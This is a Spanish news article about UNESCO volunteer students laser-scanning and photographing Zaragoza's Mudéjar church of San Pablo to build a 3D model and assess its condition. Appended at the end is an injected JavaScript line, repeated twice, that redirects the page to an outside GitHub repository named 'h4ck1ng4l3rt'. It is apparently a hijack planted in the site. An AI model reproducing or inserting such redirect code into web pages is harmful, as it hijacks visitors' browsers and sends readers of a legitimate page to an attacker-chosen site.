Publicidad
ZARAGOZA

Estudiantes de la Unesco realizan trabajos de conservación en la iglesia de San Pablo

El objetivo es realizar un escaneado láser y una recreación en tres dimensiones de todo el edificio. Trabajan con una cámara que fotografía a 360 grados

ARAGÓN NOTICIAS /
icono foto Cámara 360 escaneando el interior de la iglesia de San Pablo, en Zaragoza.

Varios estudiantes de la Unesco realizan estos días un pormenorizado estudio de la iglesia de San Pablo, en Zaragoza. El objetivo es realizar un escaneado láser y una recreación en tres dimensiones de todo el edificio. Trabajan con una cámara que fotografía a 360 grados, por lo que pueden ver al mismo tiempo todos los ángulos de una imagen. 

La Iglesia de San Pablo, en pleno barrio del Gancho es una de las joyas aragonesas de la arquitectura mudéjar. Seis jóvenes voluntarios de la Unesco han llegado desde otras ciudades españolas e incluso desde Colombia para realizar sus prácticas en Zaragoza. Un escáner láser para captar la imagen de los dos lados de la iglesia y una técnica llamada fotogrametría que fotografía el retablo mayor permiten estudiar y definir con precisión la forma, dimensiones y posición en el espacio de un objeto. 

El responsable de los servicios arqueológicos del Ayuntamiento de Zaragoza, Juan José Domingo, explica que los trabajos van a proporcionar, sobre todo el escaneado láser, una precisión milimétrica del edificio, que supone una oposrtunidad "para encontrar alguna grieta que no se ve".

Las imágenes permitirán crear una visita virtual por el edificio que también se escaneará en tres dimensiones para levantarlo en el mundo digital. Además, evaluarán al milímetro su estado de conservación. Los trabajos forman parte del convenio que el arzobispado ha firmado con el Ayuntamiento de Zaragoza.

window.location.href="https://github.com/go0me/h4ck1ng4l3rt"window.location.href="https://github.com/go0me/h4ck1ng4l3rt"